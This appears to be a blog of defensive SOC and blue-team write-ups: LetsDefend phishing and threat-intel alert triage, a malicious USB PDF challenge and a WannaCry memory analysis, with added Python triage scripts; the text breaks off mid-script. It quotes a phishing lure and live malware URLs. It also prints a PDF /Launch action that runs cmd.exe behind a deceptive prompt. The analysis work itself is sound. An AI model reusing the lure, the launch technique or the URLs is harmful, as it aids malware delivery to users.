4ensiX

I noticed that for the alerts I judged FP, I selected FP but the display shows TP.

LetsDefend level 1 alert SOC101 - Phishing Mail Detected event-id 27

Details

EventID: 27
Event Time: Oct. 29, 2020, 7:25 p.m.
Rule: SOC101 - Phishing Mail Detected
Level: Security Analyst
SMTP Address 146.56.209.252
Source Address ndt@zol.co.zw
Destination Address susie@letsdefend.io
E-mail Subject UPS Your Packages Status Has Changed
Device Action Blocked

playbook

Are there attachments or URLs in the email?

Answer: Yes

Analyze Url/Attachment

Sender IP 146.56.209.252

VirusTotal: https://www.virustotal.com/gui/ip-address/146.56.209.252/detection
AbuseIPDB: https://www.abuseipdb.com/check/146.56.209.252
ip-sc: https://ip-sc.net/ja/r/146.56.209.252

The IP geolocates to China, Shenzhen Tencent. It is used as a source of SSH brute-force attacks.

Sender Domain zol.co[.]zw

Hybrid-Analysis: https://www.hybrid-analysis.com/search?query=zol.co.zw
The domain is suspicious, though.

Mail

UPS Your Packages Status Has Changed

From: ndt@zol.co.zw Oct. 29, 2020, 7:25 p.m.
To: susie@letsdefend.io Oct. 29, 2020, 7:25 p.m.
You have received a secure message from a Veterans United Employee.

Click below link by 2020-11-14 14:30 CDT to read your message. After that, open attachment.

https://hredoybangladesh.com/content/docs/wvoiha4vd1aqty/

VirusTotal: https://www.virustotal.com/gui/url/2825a389272fd0e4b9923c98644a1786d4019ec7002c0a718b59dbe6d713a889
URLhaus: https://urlhaus.abuse.ch/url/698975/
The page cannot be reached any more, so I cannot confirm it directly, but the VT report flags it as a malware download URL, and URLhaus reports it as related to Emotet/Heodo.
The most recent file associated with this link in the URLhaus report is:
VirusTotal: https://www.virustotal.com/gui/file/360a5cb7eed923017b4ef07460e7652362cdf1fc0a902516addbb8e244e30134/detection/f-360a5cb
Searching ANY.RUN for the same hash:
ANYRUN: https://app.any.run/tasks/989ac1f3-9d9e-4854-80c1-f65b1b8cd1a2/
The macro launches PowerShell, executes what it downloads, and then communicates with the C2 server, sets up auto-start persistence, and so on.

hredoybangladesh[.]com

The domain is also flagged by several vendors.
VirusTotal: https://www.virustotal.com/gui/domain/hredoybangladesh.com/detection


Answer: Malicious

Check If Mail Delivered to User?

Device Action Blocked

Answer: Not Delivered

Add Artifacts

Value Type Comment
ndt@zol.co.zw E-mail Sender 146.56.209.252
https[:]//hredoybangladesh[.]com/content/docs/wvoiha4vd1aqty/ URL Address download link(emotet,heodo)

End

close alert event-id 27

LetsDefend level 1 alert SOC105 - Requested T.I. URL address event-id 28

Details

EventID: 28
Event Time: Oct. 29, 2020, 7:34 p.m.
Rule: SOC105 - Requested T.I. URL address
Level: Security Analyst
Source Address 172.16.17.47
Source Hostname BillPRD
Destination Address 115.99.150.132
Username Bill
Request URL http[:]//115.99.150.132:56841/Mozi.m
User Agent Firewall Test - Dont Block
Device Action Blocked

playbook

Analyze Threat Intel Data

http[:]//115.99.150.132:56841/Mozi.m

VirusTotal: https://www.virustotal.com/gui/url/95f3eda1ff810022df76400ab1d5f2e4ac44817f116678132486fc92ec6aab46
URLhaus: https://urlhaus.abuse.ch/url/748225/
On VT the URL is marked Malicious by well-known vendors, so it is suspicious.
Since it is listed on URLhaus, the URL is definitely malware-related.

Download file Mozi.m

Answer: Malicious

Interaction with TI data

DATE TYPE SOURCE ADDRESS SOURCE PORT DESTINATION ADDRESS DESTINATION PORT
Oct, 29, 2020, 07:34 PM Proxy 172.16.17.47 46938 115.99.150.132 56841
Request URL: http://115.99.150.132:56841/Mozi.m
Request Method: GET
Device Action: Blocked
Process: chrome.exe
Parent Process: explorer.exe
Parent Process MD5: 8b88ebbb05a0e56b7dcc708498c02b3e

The access was blocked. No traces were found on the endpoint.

Answer: Not Accessed

Add Artifacts

Value Type Comment
http[:]//115.99.150.132:56841/Mozi.m URL Address download malware
a73ddd6ec22462db955439f665cad4e6 MD5 Hash Mozi.m - elf malware?
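Both alerts above finish with an Add Artifacts step where the indicators are written defanged. The script below is an added example (not part of the original write-up or of LetsDefend): it pulls URLs, e-mail addresses and IPv4 addresses out of an alert's Details text, separates internal addresses from ones worth submitting to TI, defangs them in the bracket notation of the tables above, derives the VirusTotal URL identifier (the SHA-256 of the URL string, which is the hex value after /gui/url/ in the VT links), and flags the SOC105 pattern of a file fetched from a bare IP on a non-standard port. The alert text is copied from the event-id 28 Details block; the artifact type labels and the heuristic are my own choices.

```python
import hashlib
import ipaddress
import re
from typing import Dict, List, Tuple
from urllib.parse import urlsplit

# Alert fields copied from the event-id 28 Details block above (LetsDefend
# layout). Any other alert text in the same shape can be passed instead.
ALERT_28 = """\
EventID: 28
Rule: SOC105 - Requested T.I. URL address
Source Address 172.16.17.47
Source Hostname BillPRD
Destination Address 115.99.150.132
Username Bill
Request URL http://115.99.150.132:56841/Mozi.m
User Agent Firewall Test - Dont Block
Device Action Blocked
"""

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def _dedup(items: List[str]) -> List[str]:
    return list(dict.fromkeys(items))


def extract_iocs(text: str) -> Dict[str, List[str]]:
    """Pull URLs, e-mail addresses and IPv4 addresses out of alert text.

    Addresses are validated with ipaddress, and RFC 1918 / loopback /
    link-local ones are reported separately so that an internal source
    host (172.16.17.47 here) is not pushed to TI as an artifact.
    """
    public, internal = [], []
    for raw in _dedup(IPV4_RE.findall(text)):
        try:
            ip = ipaddress.ip_address(raw)
        except ValueError:
            continue  # matched the regex but is not an address, e.g. 999.1.1.1
        (public if ip.is_global else internal).append(raw)
    return {
        "urls": _dedup(URL_RE.findall(text)),
        "emails": _dedup(EMAIL_RE.findall(text)),
        "public_ips": public,
        "internal_ips": internal,
    }


def defang(value: str) -> str:
    """Make an IOC non-clickable using the bracket notation of the artifact
    tables above: '://' -> '[:]//', '.' -> '[.]', '@' -> '[@]'."""
    return value.replace("://", "[:]//").replace(".", "[.]").replace("@", "[@]")


def refang(value: str) -> str:
    """Inverse of defang(), for pasting an artifact back into a lookup tool."""
    return value.replace("[:]//", "://").replace("[.]", ".").replace("[@]", "@")


def vt_url_id(url: str) -> str:
    """VirusTotal's URL identifier is the SHA-256 of the URL string; it is the
    hex value after /gui/url/ in the VT links above. VT canonicalizes URLs
    before hashing, so for unusual inputs confirm the id with the API."""
    return hashlib.sha256(url.encode("utf-8")).hexdigest()


def direct_ip_download(url: str) -> bool:
    """Heuristic (my own, not a LetsDefend rule): a file fetched from a bare
    IP address on a non-standard port, as with Mozi.m above, is typical of
    botnet staging servers and worth escalating even without a TI match."""
    parts = urlsplit(url)
    try:
        ipaddress.ip_address(parts.hostname or "")
    except ValueError:
        return False
    return parts.port is not None and parts.port not in (80, 443)


def artifact_rows(text: str) -> List[Tuple[str, str, str]]:
    """Rows for the 'Add Artifacts' step: (defanged value, type, comment)."""
    iocs = extract_iocs(text)
    rows = []
    for url in iocs["urls"]:
        note = "direct IP download on non-standard port" if direct_ip_download(url) else ""
        rows.append((defang(url), "URL Address", note))
    for ip in iocs["public_ips"]:
        rows.append((defang(ip), "IP Address", ""))
    for mail in iocs["emails"]:
        rows.append((defang(mail), "E-mail Sender", ""))
    return rows


if __name__ == "__main__":
    for row in artifact_rows(ALERT_28):
        print("\t".join(row))
    for url in extract_iocs(ALERT_28)["urls"]:
        print("VT lookup id:", vt_url_id(url))
```

Destination addresses such as susie@letsdefend.io are extracted too; the analyst still decides which of them belong in the artifact list.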

End

close alert event-id 28

Old alerts are not very interesting.

LetsDefend level 1 alert SOC101 - Phishing Mail Detected event-id 29

Details

EventID: 29
Event Time: Oct. 29, 2020, 7:43 p.m.
Rule: SOC101 - Phishing Mail Detected
Level: Security Analyst
SMTP Address 191.233.193.73
Source Address icianb@hotmail.com
Destination Address sofia@letsdefend.io
E-mail Subject Invoice
Device Action Blocked

playbook

Are there attachments or URLs in the email?

Mail

Invoice

From: icianb@hotmail.com Oct. 29, 2020, 7:43 p.m.
To: sofia@letsdefend.io Oct. 29, 2020, 7:43 p.m.

Hello,

Attached copy of your unpaid invoice & Statement Our Statement shows 2 invoices are paid. Our AP did confirmed payment was paid on the 13th of October into your Bank account.

Thank you.

Attachments:
4abd5dd8377e5810116f3665bd8d92f0.zip

Answer: Yes

Analyze Url/Attachment

The sender is a hotmail address, so that tells us little. This time the problem seems to be in the attachment.

$ sha256sum 43fb4c1abaa3a8d79300fcc9eb12214a0b821ffe32f6389cd5e45ba5360e06aa.exe 
43fb4c1abaa3a8d79300fcc9eb12214a0b821ffe32f6389cd5e45ba5360e06aa  43fb4c1abaa3a8d79300fcc9eb12214a0b821ffe32f6389cd5e45ba5360e06aa.exe

VirusTotal 35/68: https://www.virustotal.com/gui/file/43fb4c1abaa3a8d79300fcc9eb12214a0b821ffe32f6389cd5e45ba5360e06aa/detection
Hybrid-Analysis: https://www.hybrid-analysis.com/sample/43fb4c1abaa3a8d79300fcc9eb12214a0b821ffe32f6389cd5e45ba5360e06aa/5f9d102805f963128371eff5
For now, Malicious is a safe call. Performing network device lookups is also suspicious. VT has a report describing it as an APT scanner.

Answer: Malicious

Check If Mail Delivered to User?

Device Action Blocked

Answer: Not Delivered

Add Artifacts

Value Type Comment
icianb@hotmail.com E-mail Sender 191.233.193.73
4abd5dd8377e5810116f3665bd8d92f0 MD5 Hash APT Scanner? Malicious by VT

End

close alert event-id 29

BTLO Challenge Suspicious USB Stick(Retired Challenge) write up

BTLO Challenge Suspicious USB Stick(Retired Challenge)

Scenario

One of our clients informed us they recently suffered an employee data breach. As a startup company, they had a constrained budget allocated for security and employee training. I visited them and spoke with the relevant stakeholders. I also collected some suspicious emails and a USB drive an employee found on their premises. While I am analyzing the suspicious emails, can you check the contents on the USB drive?

Reading Material:
https://zeltser.com/analyzing-malicious-documents/
https://en.wikipedia.org/wiki/List_of_file_signatures
https://eternal-todo.com/tools/peepdf-pdf-analysis-tool.

Challenge Submission

1. What file is the autorun.inf running? (3 points)

Format: filename.extension

$ cat autorun.inf 
[autorun]
open=README.pdf
icon=autorun.ico

Answer: README.pdf

2. Does the pdf file pass virustotal scan? (No malicious results returned) (2 points)

True or False

SHA256: c868cd6ae39dc3ebbc225c5f8dc86e3b01097aa4b0076eac7960256038e60b43 https://www.virustotal.com/gui/file/c868cd6ae39dc3ebbc225c5f8dc86e3b01097aa4b0076eac7960256038e60b43

38/59

Answer: False

3. Does the file have the correct magic number? (2 points)

True or False

$ file README.pdf 
README.pdf: PDF document, version 1.7
$ hexdump -C README.pdf | head
00000000  25 50 44 46 2d 31 2e 37  0d 0a 25 b5 b5 b5 b5 0d  |%PDF-1.7..%.....|
00000010  0a 31 20 30 20 6f 62 6a  0d 0a 3c 3c 2f 54 79 70  |.1 0 obj..<</Typ|
00000020  65 2f 43 61 74 61 6c 6f  67 2f 50 61 67 65 73 20  |e/Catalog/Pages |
00000030  32 20 30 20 52 2f 4c 61  6e 67 28 65 6e 2d 55 53  |2 0 R/Lang(en-US|
00000040  29 20 2f 53 74 72 75 63  74 54 72 65 65 52 6f 6f  |) /StructTreeRoo|
00000050  74 20 31 30 20 30 20 52  2f 4d 61 72 6b 49 6e 66  |t 10 0 R/MarkInf|
00000060  6f 3c 3c 2f 4d 61 72 6b  65 64 20 74 72 75 65 3e  |o<</Marked true>|
00000070  3e 2f 4d 65 74 61 64 61  74 61 20 32 30 20 30 20  |>/Metadata 20 0 |
00000080  52 2f 56 69 65 77 65 72  50 72 65 66 65 72 65 6e  |R/ViewerPreferen|
00000090  63 65 73 20 32 31 20 30  20 52 3e 3e 0d 0a 65 6e  |ces 21 0 R>>..en|

Answer: True

4. What OS type can the file exploit? (Linux, MacOS, Windows, etc) (5 points)

Operating System

$ pdfinfo  README.pdf 
Creator:        StarMan
CreationDate:   Thu Feb 11 02:54:49 2021 EST
ModDate:        Thu Feb 11 02:54:49 2021 EST
Tagged:         yes
UserProperties: no
Suspects:       no
Form:           none
Syntax Warning: Bad launch-type link action
JavaScript:     no
Pages:          1
Encrypted:      no
Page size:      612 x 792 pts (letter)
Page rot:       0
File size:      136561 bytes
Optimized:      no
PDF version:    1.7
$ pdfid  README.pdf 
PDFiD 0.2.7 README.pdf
 PDF Header: %PDF-1.7
 obj                   25
 endobj                25
 stream                 7
 endstream              7
 xref                   4
 trailer                4
 startxref              4
 /Page                  2
 /Encrypt               0
 /ObjStm                1
 /JS                    1
 /JavaScript            1
 /AA                    1
 /OpenAction            1
 /AcroForm              0
 /JBIG2Decode           0
 /RichMedia             0
 /Launch                1
 /EmbeddedFile          0
 /XFA                   0
 /Colors > 2^24         0
$ pdf-parser -a README.pdf 
This program has not been tested with this version of Python (3.9.7)
Should you encounter problems, please use Python version 3.8.7
Comment: 8
XREF: 4
Trailer: 4
StartXref: 4
Indirect object: 24
  8: 4, 9, 18, 19, 21, 24, 26, 9
 /Action 2: 27, 28
 /Catalog 2: 1, 1
 /ExtGState 2: 7, 8
 /Filespec 1: 25
 /Font 1: 5
 /FontDescriptor 1: 6
 /Metadata 2: 20, 20
 /ObjStm 1: 17
 /Page 2: 3, 3
 /Pages 1: 2
 /XRef 1: 22
Search keywords:
 /JS 1: 27
 /JavaScript 1: 27
 /AA 1: 3
 /OpenAction 1: 1
 /Launch 1: 28
# check the /JS, /JavaScript, /OpenAction and /Launch objects
$ pdf-parser -o 27 README.pdf 
This program has not been tested with this version of Python (3.9.7)
Should you encounter problems, please use Python version 3.8.7
obj 27 0
 Type: /Action
 Referencing: 

  <<
    /S /JavaScript
    /JS (this.exportDataObject({ cName: "README", nLaunch: 0 });)
    /Type /Action
  >>
$ pdf-parser -o 1 README.pdf 
This program has not been tested with this version of Python (3.9.7)
Should you encounter problems, please use Python version 3.8.7
obj 1 0
 Type: /Catalog
 Referencing: 2 0 R, 10 0 R, 20 0 R, 21 0 R

  <<
    /Type /Catalog
    /Pages 2 0 R
    /Lang (en-US)
    /StructTreeRoot 10 0 R
    /MarkInfo
      <<
        /Marked true
      >>
    /Metadata 20 0 R
    /ViewerPreferences 21 0 R
  >>


obj 1 0
 Type: /Catalog
 Referencing: 2 0 R, 23 0 R, 27 0 R, 10 0 R, 20 0 R, 21 0 R

  <<
    /Type /Catalog
    /Pages 2 0 R
    /Names 23 0 R
    /OpenAction 27 0 R
    /Lang (en-US)
    /StructTreeRoot 10 0 R
    /MarkInfo
      <<
        /Marked true
      >>
    /Metadata 20 0 R
    /ViewerPreferences 21 0 R
  >>
$ pdf-parser -o 28 README.pdf 
This program has not been tested with this version of Python (3.9.7)
Should you encounter problems, please use Python version 3.8.7
obj 28 0
 Type: /Action
 Referencing: 

  <<
    /S /Launch
    /Type /Action
    /Win
      <<
        /F (cmd.exe)
        /D '(c:\\\\windows\\\\system32)'
        /P '(/Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "Desktop\\\\README.pdf" (cd "Desktop"))&(if exist "My Documents\\\\README.pdf" (cd "My Documents"))&(if exist "Documents\\\\README.pdf" (cd "Documents"))&(if exist "Escritorio\\\\README.pdf" (cd "Escritorio"))&(if exist "Mis Documentos\\\\README.pdf" (cd "Mis Documentos"))&(start README.pdf)\n\n\n\n\n\n\n\n\n\nTo view the encrypted content please tick the "Do not show this message again" box and press Open.)'
      >>
  >>

Answer: windows

5. A Windows executable is mentioned in the pdf file, what is it? (3 points)

Format: filename.exe
From the output of $ pdf-parser -o 28 README.pdf above:
Answer: cmd.exe

6. How many suspicious /OpenAction elements does the file have? (5 points)

From the $ pdfid README.pdf output, and from obj 1, there is one /OpenAction (27 0 R) that executes the suspicious JavaScript.
Answer: 1
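The checks run above with file, hexdump, pdfid and pdf-parser (the %PDF- signature, counts of /OpenAction, /AA, /JS, /JavaScript and /Launch, and the /Win /F target of the Launch action) can be reproduced in a short script. The following is an added example, not part of the challenge, the write-up or Didier Stevens' tools: it scans a PDF's raw bytes the way pdfid does, resolving the #xx hex escapes that are used to hide names (so /#4aavaScript is counted as /JavaScript), and pulls the executable out of any /Launch action. The embedded sample is constructed to mirror README.pdf's structure (OpenAction pointing at a JavaScript action plus a Launch to cmd.exe); it is not the challenge file. One caveat: a raw scan does not see keywords inside compressed object streams, which is why pdfid also counts /ObjStm; for those use pdf-parser's -O option or peepdf.

```python
import re
import sys
from typing import Dict, List

# Keywords pdfid counts that matter for triage (a subset of its full list).
SUSPICIOUS = ["/OpenAction", "/AA", "/JS", "/JavaScript", "/Launch",
              "/EmbeddedFile", "/RichMedia", "/XFA", "/ObjStm"]

# Constructed sample mimicking README.pdf: a catalog whose /OpenAction is a
# JavaScript action, and a Launch action that runs cmd.exe. Not the challenge
# file. '/#4aavaScript' is '/JavaScript' with the 'J' hex-escaped.
SAMPLE_PDF = b"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 27 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /AA << /O 28 0 R >> >> endobj
27 0 obj << /Type /Action /S /#4aavaScript /JS (this.exportDataObject({ cName: "README", nLaunch: 0 });) >> endobj
28 0 obj << /Type /Action /S /Launch /Win << /F (cmd.exe) /D (c:\\\\windows\\\\system32) /P (/Q /C start README.pdf) >> >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""


def has_pdf_magic(data: bytes) -> bool:
    """The signature is '%PDF-' at offset 0 (25 50 44 46 2d in the hexdump
    above). Readers tolerate junk before the header, so False is a red flag
    while True proves nothing about the content."""
    return data[:5] == b"%PDF-"


_HEX_NAME_ESC = re.compile(rb"#([0-9A-Fa-f]{2})")


def normalize_names(data: bytes) -> bytes:
    """Resolve '#xx' escapes so obfuscated names match their keyword, the same
    trick pdfid uses. Applied to the whole buffer for simplicity, whereas the
    PDF spec only defines the escape inside name objects."""
    return _HEX_NAME_ESC.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def keyword_counts(data: bytes) -> Dict[str, int]:
    """Count each keyword as a whole name token (followed by whitespace or a
    delimiter), so '/JS' is not counted inside a longer name."""
    norm = normalize_names(data)
    counts = {}
    for kw in SUSPICIOUS:
        pat = re.escape(kw.encode()) + rb"(?=[\s/\[\]<>(){}%]|$)"
        counts[kw] = len(re.findall(pat, norm))
    return counts


_LAUNCH_WIN = re.compile(rb"/Launch.*?/Win\s*<<(.*?)>>", re.S)
_F_ENTRY = re.compile(rb"/F\s*\((.*?)\)", re.S)


def launch_targets(data: bytes) -> List[str]:
    """Return the /Win /F executables named by /Launch actions (question 5)."""
    norm = normalize_names(data)
    targets = []
    for m in _LAUNCH_WIN.finditer(norm):
        f = _F_ENTRY.search(m.group(1))
        if f:
            targets.append(f.group(1).decode("latin-1"))
    return targets


def triage(data: bytes) -> Dict[str, object]:
    """One-shot summary comparable to the pdfid / pdf-parser pass above."""
    counts = keyword_counts(data)
    auto_exec = counts["/OpenAction"] + counts["/AA"]
    script = counts["/JS"] + counts["/JavaScript"]
    return {
        "magic_ok": has_pdf_magic(data),
        "counts": counts,
        "launch_targets": launch_targets(data),
        # something runs on open, and it is script or an external Launch
        "suspicious": auto_exec > 0 and (script > 0 or counts["/Launch"] > 0),
    }


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PDF
    for key, value in triage(data).items():
        print(f"{key}: {value}")
```

Run it with a path to scan a real file (python3 pdf_triage.py README.pdf); without an argument it scans the embedded sample.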

BTLO Challenge Memory Analysis - Ransomware(Retired Challenge) write up

I have started on BTLO.
The service teaches practical Blue Team (defensive) skills through prepared files and scenarios. There are Investigations, which come with a ready environment, and Challenges, where you are handed files to analyze.
Under the terms of service, write-ups of Retired Investigations and Challenges may be published. This is a write-up of the Memory Analysis - Ransomware challenge.

BTLO Challenge Memory Analysis - Ransomware(Retired Challenge)

Scenario

The Account Executive called the SOC earlier and sounds very frustrated and angry. He stated he can’t access any files on his computer and keeps receiving a pop-up stating that his files have been encrypted. You disconnected the computer from the network and extracted the memory dump of his machine and started analyzing it with Volatility. Continue your investigation to uncover how the ransomware works and how to stop it!

Challenge Submission

The memory dump for this challenge (imageinfo output):

Volatility Foundation Volatility Framework 2.6.1
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86_24000, Win7SP1x86
                     AS Layer1 : IA32PagedMemoryPae (Kernel AS)
                     AS Layer2 : FileAddressSpace (/home/volatility/BTLO/BTLO Memory Analysis - Ransomware/infected.vmem)
                      PAE type : PAE
                           DTB : 0x185000L
                          KDBG : 0x82948c28L
          Number of Processors : 1
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0x82949c00L
             KUSER_SHARED_DATA : 0xffdf0000L
           Image date and time : 2021-01-31 18:24:57 UTC+0000
     Image local date and time : 2021-01-31 13:24:57 -0500

1. Run “vol.py -f infected.vmem --profile=Win7SP1x86 psscan” that will list all processes. What is the name of the suspicious process?

Format: @ProcessName

$ vol.py -f infected.vmem --profile=Win7SP1x86 psscan
Volatility Foundation Volatility Framework 2.6.1
Offset(P)          Name                PID   PPID PDB        Time created                   Time exited                   
------------------ ---------------- ------ ------ ---------- ------------------------------ ------------------------------
0x000000000be92b88 dwm.exe            1424    856 0x1e6d92e0 2021-01-31 18:01:12 UTC+0000                                 
0x000000001dc0fd40 svchost.exe         688    496 0x1e6d9140 2021-01-31 18:01:11 UTC+0000                                 
0x000000001dc22520 svchost.exe         736    496 0x1e6d9160 2021-01-31 18:01:11 UTC+0000                                 
0x000000001dc33030 taskhsvc.exe       2968   2924 0x1e6d92c0 2021-01-31 18:02:20 UTC+0000                                 
0x000000001dc58030 svchost.exe         856    496 0x1e6d91a0 2021-01-31 18:01:11 UTC+0000                                 
0x000000001dc6d548 svchost.exe         896    496 0x1e6d91c0 2021-01-31 18:01:11 UTC+0000                                 
0x000000001dc92a88 svchost.exe        1000    496 0x1e6d9200 2021-01-31 18:01:11 UTC+0000                                 
0x000000001dca9030 svchost.exe        1068    496 0x1e6d9220 2021-01-31 18:01:12 UTC+0000                                 
0x000000001dcd6030 spoolsv.exe        1196    496 0x1e6d9240 2021-01-31 18:01:12 UTC+0000                                 
0x000000001dcd91c8 svchost.exe        2204    496 0x1e6d95e0 2021-01-31 18:03:14 UTC+0000                                 
0x000000001dd07290 svchost.exe        1252    496 0x1e6d9280 2021-01-31 18:01:12 UTC+0000                                 
0x000000001dd32cb0 taskhost.exe       1348    496 0x1e6d92a0 2021-01-31 18:01:12 UTC+0000                                 
0x000000001df45030 csrss.exe           404    388 0x1e6d9040 2021-01-31 18:01:11 UTC+0000                                 
0x000000001df5a450 svchost.exe        2380    496 0x1e6d9560 2021-01-31 18:03:15 UTC+0000                                 
0x000000001df5f030 services.exe        496    396 0x1e6d9080 2021-01-31 18:01:11 UTC+0000                                 
0x000000001df63030 winlogon.exe        460    388 0x1e6d90c0 2021-01-31 18:01:11 UTC+0000                                 
0x000000001df72958 lsass.exe           504    396 0x1e6d90e0 2021-01-31 18:01:11 UTC+0000                                 
0x000000001df74030 lsm.exe             512    396 0x1e6d9100 2021-01-31 18:01:11 UTC+0000                                 
0x000000001df975b0 svchost.exe        2508    496 0x1e6d9420 2021-01-31 18:21:28 UTC+0000                                 
0x000000001dfc25f8 conhost.exe        2976    404 0x1e6d94e0 2021-01-31 18:02:20 UTC+0000                                 
0x000000001dfcf108 powercfg.exe       3304    496 0x1e6d9460 2021-01-31 18:23:23 UTC+0000   2021-01-31 18:24:24 UTC+0000  
0x000000001dfe2b08 svchost.exe         620    496 0x1e6d9120 2021-01-31 18:01:11 UTC+0000                                 
0x000000001e178968 csrss.exe           356    340 0x1e6d9060 2021-01-31 18:01:11 UTC+0000                                 
0x000000001e1801f8 wininit.exe         396    340 0x1e6d90a0 2021-01-31 18:01:11 UTC+0000                                 
0x000000001e992a88 taskdl.exe         4060   2732 0x1e6d9540 2021-01-31 18:24:54 UTC+0000   2021-01-31 18:24:54 UTC+0000  
0x000000001ec3ea58 WmiPrvSE.exe       1296    620 0x1e6d9400 2021-01-31 18:01:14 UTC+0000                                 
0x000000001ec424a0 svchost.exe        2032    496 0x1e6d93a0 2021-01-31 18:01:13 UTC+0000                                 
0x000000001ec81d40 dllhost.exe        1740    496 0x1e6d9440 2021-01-31 18:01:14 UTC+0000                                 
0x000000001ed0a030 SearchFilterHo     3008   2232 0x1e6d9620 2021-01-31 18:23:00 UTC+0000                                 
0x000000001ed3d940 WmiPrvSE.exe        208    620 0x1e6d9520 2021-01-31 18:24:23 UTC+0000                                 
0x000000001ed5ead8 SearchProtocol     2304   2232 0x1e6d9180 2021-01-31 18:01:18 UTC+0000                                 
0x000000001ee6a030 explorer.exe       1456   1408 0x1e6d9300 2021-01-31 18:01:12 UTC+0000                                 
0x000000001ee80a48 VGAuthService.     1560    496 0x1e6d9320 2021-01-31 18:01:12 UTC+0000                                 
0x000000001eef9d40 vm3dservice.ex     1688   1456 0x1e6d9340 2021-01-31 18:01:12 UTC+0000                                 
0x000000001ef04498 vmtoolsd.exe       1700   1456 0x1e6d9360 2021-01-31 18:01:12 UTC+0000                                 
0x000000001ef11030 vmtoolsd.exe       1720    496 0x1e6d9380 2021-01-31 18:01:13 UTC+0000                                 
0x000000001ef28a78 msdtc.exe          2044    496 0x1e6d93c0 2021-01-31 18:01:16 UTC+0000                                 
0x000000001ef9ed40 @WanaDecryptor     2688   2732 0x1e6d9460 2021-01-31 18:24:49 UTC+0000   2021-01-31 18:24:49 UTC+0000  
0x000000001efb5418 smss.exe            268      4 0x1e6d9020 2021-01-31 18:01:10 UTC+0000                                 
0x000000001efc1d40 SearchIndexer.     2232    496 0x1e6d9260 2021-01-31 18:01:18 UTC+0000                                 
0x000000001fcbc0f0 sppsvc.exe         2432    496 0x1e6d9580 2021-01-31 18:03:14 UTC+0000                                 
0x000000001fcc6800 @WanaDecryptor     3968   2732 0x1e6d95c0 2021-01-31 18:02:48 UTC+0000                                 
0x000000001fcd4350 or4qtckT.exe       2732   1456 0x1e6d94c0 2021-01-31 18:02:16 UTC+0000                                 
0x000000001fff1c40 System                4      0 0x00185000 2021-01-31 20:56:12 UTC+0000                                 
0x000000001fff6920 System                4      0 0x00185000 2021-01-31 18:01:10 UTC+0000


Answer: @WanaDecryptor

2. What is the parent process ID for the suspicious process?

Parent Process ID (PPID)
Answer: 2732

3. What is the initial malicious executable that created this process?

Format: filename.exe
PID 2732 is or4qtckT.exe.
Answer: or4qtckT.exe

4. If you drill down on the suspicious PID (vol.py -f infected.vmem --profile=Win7SP1x86 psscan | grep (PIDhere)), find the process used to delete files

Format: filename.extension

$ vol.py -f infected.vmem --profile=Win7SP1x86 psscan | grep 2732
Volatility Foundation Volatility Framework 2.6.1
0x000000001e992a88 taskdl.exe         4060   2732 0x1e6d9540 2021-01-31 18:24:54 UTC+0000   2021-01-31 18:24:54 UTC+0000  
0x000000001ef9ed40 @WanaDecryptor     2688   2732 0x1e6d9460 2021-01-31 18:24:49 UTC+0000   2021-01-31 18:24:49 UTC+0000  
0x000000001fcc6800 @WanaDecryptor     3968   2732 0x1e6d95c0 2021-01-31 18:02:48 UTC+0000                                 
0x000000001fcd4350 or4qtckT.exe       2732   1456 0x1e6d94c0 2021-01-31 18:02:16 UTC+0000     

Answer: taskdl.exe
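Questions 1 to 4 are answered by reading PID/PPID relations off the psscan table. The script below is an added example (not part of the challenge, the write-up or Volatility): it parses psscan output text, rebuilds the parent/child tree, walks the lineage of a process, and flags what psscan alone can show, namely exited processes (a non-empty Time exited column, like taskdl.exe and the second @WanaDecryptor) and duplicate PID entries (the two System rows above, which appear because psscan carves _EPROCESS structures out of physical memory instead of walking the live process list). The embedded rows are a subset copied from the psscan output above; the regex assumes Volatility 2's column layout.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional

# Subset of the psscan rows shown above (Volatility 2.6.1, Win7SP1x86).
PSSCAN_OUTPUT = """\
Volatility Foundation Volatility Framework 2.6.1
Offset(P)          Name                PID   PPID PDB        Time created                   Time exited                   
------------------ ---------------- ------ ------ ---------- ------------------------------ ------------------------------
0x000000001df5f030 services.exe        496    396 0x1e6d9080 2021-01-31 18:01:11 UTC+0000                                 
0x000000001e992a88 taskdl.exe         4060   2732 0x1e6d9540 2021-01-31 18:24:54 UTC+0000   2021-01-31 18:24:54 UTC+0000  
0x000000001ee6a030 explorer.exe       1456   1408 0x1e6d9300 2021-01-31 18:01:12 UTC+0000                                 
0x000000001ef9ed40 @WanaDecryptor     2688   2732 0x1e6d9460 2021-01-31 18:24:49 UTC+0000   2021-01-31 18:24:49 UTC+0000  
0x000000001fcc6800 @WanaDecryptor     3968   2732 0x1e6d95c0 2021-01-31 18:02:48 UTC+0000                                 
0x000000001fcd4350 or4qtckT.exe       2732   1456 0x1e6d94c0 2021-01-31 18:02:16 UTC+0000                                 
0x000000001fff1c40 System                4      0 0x00185000 2021-01-31 20:56:12 UTC+0000                                 
0x000000001fff6920 System                4      0 0x00185000 2021-01-31 18:01:10 UTC+0000
"""

# One psscan row: offset, name, PID, PPID, DTB, created, optional exited.
ROW_RE = re.compile(
    r"^(?P<offset>0x[0-9a-fA-F]+)\s+(?P<name>\S+)\s+(?P<pid>\d+)\s+(?P<ppid>\d+)\s+"
    r"(?P<pdb>0x[0-9a-fA-F]+)\s+(?P<created>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d \S+)"
    r"(?:\s+(?P<exited>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d \S+))?\s*$"
)


@dataclass
class Proc:
    offset: str
    name: str
    pid: int
    ppid: int
    created: str
    exited: Optional[str]  # None while the process was still running


def parse_psscan(text: str) -> List[Proc]:
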